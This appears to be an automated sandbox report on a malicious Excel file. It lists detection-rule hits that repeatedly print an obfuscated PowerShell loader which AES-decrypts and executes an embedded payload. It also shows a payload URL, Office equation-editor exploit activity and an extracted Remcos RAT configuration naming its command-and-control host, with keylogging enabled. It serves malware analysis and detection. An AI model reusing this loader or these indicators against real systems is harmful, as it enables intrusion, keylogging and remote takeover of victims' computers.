'+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Sigma detected: Suspicious Microsoft Office Child Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 724, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , ProcessId: 3196, ProcessName: wscript.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 724, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , ProcessId: 3196, ProcessName: wscript.exe
            Sigma detected: Excel Network Connections
            Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 724, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Sigma detected: Suspicious Office Outbound Connections
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 724, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 80
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 724, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , ProcessId: 3196, ProcessName: wscript.exe
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 724, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Sigma detected: Office Macro File Creation
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2504, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3240, TargetFilename: C:\Users\user\AppData\Local\Temp\eyxcmf0f.2tf.ps1

            Stealing of Sensitive Information

            barindex
            Sigma detected: Remcos
            Source: Registry Key setAuthor: Joe Security: Data: Details: CC C0 05 F8 36 77 FF 59 27 3F 52 CE FC 6B 29 F4 01 51 C6 7F D4 F9 81 6A A4 65 7F 05 A3 94 9F E7 97 F1 FE 17 20 A1 AD 1D 85 9E 4E 18 5D 5C 03 79 AD E1 C1 0E 06 23 D4 2A 0B 82 5C BA BD 87 A8 1F E6 3B 36 83 8F E7 02 1D C7 DD 21 B7 96 67 AA 0D B6 E4 7B EA 7A 65 6B D5 78 8A 95 65 C7 B4 90 4A 85 E2 73 85 16 4A 78 E7 49 AF 8E 2F 63 5C F9 16 16 23 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3384, TargetObject: HKEY_CURRENT_USER\Software\Rmc-999Z97\exepath

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-26T13:09:04.026573+0200
            SID:2803304
            Source Port:49174
            Destination Port:80
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-26T13:08:58.500549+0200
            SID:2049038
            Source Port:80
            Destination Port:49171
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T13:08:59.714462+0200
            SID:2020424
            Source Port:80
            Destination Port:49172
            Protocol:TCP
            Classtype:Exploit Kit Activity Detected
            Timestamp:2024-07-26T13:08:57.397604+0200
            SID:2047750
            Source Port:80
            Destination Port:49171
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T13:09:01.750905+0200
            SID:2036594
            Source Port:49173
            Destination Port:14645
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://198.46.176.133/Upload/vbs.jpegAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09A9DB5.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Found malware configuration
            Source: 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "sembe.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-999Z97", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "nots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Multi AV Scanner detection for submitted file
            Source: AWD 490104998518.xlsReversingLabs: Detection: 28%
            Yara detected Remcos RAT
            Source: Yara matchFile source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3384, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
            Machine Learning detection for sample
            Source: AWD 490104998518.xlsJoe Sandbox ML: detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_00433837
            Source: powershell.exe, 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_b18ad6bd-a

            Exploits

            barindex
            Yara detected UAC Bypass using CMSTP
            Source: Yara matchFile source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3384, type: MEMORYSTR
            Office equation editor establishes network connection
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 192.3.176.174 Port: 80Jump to behavior
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
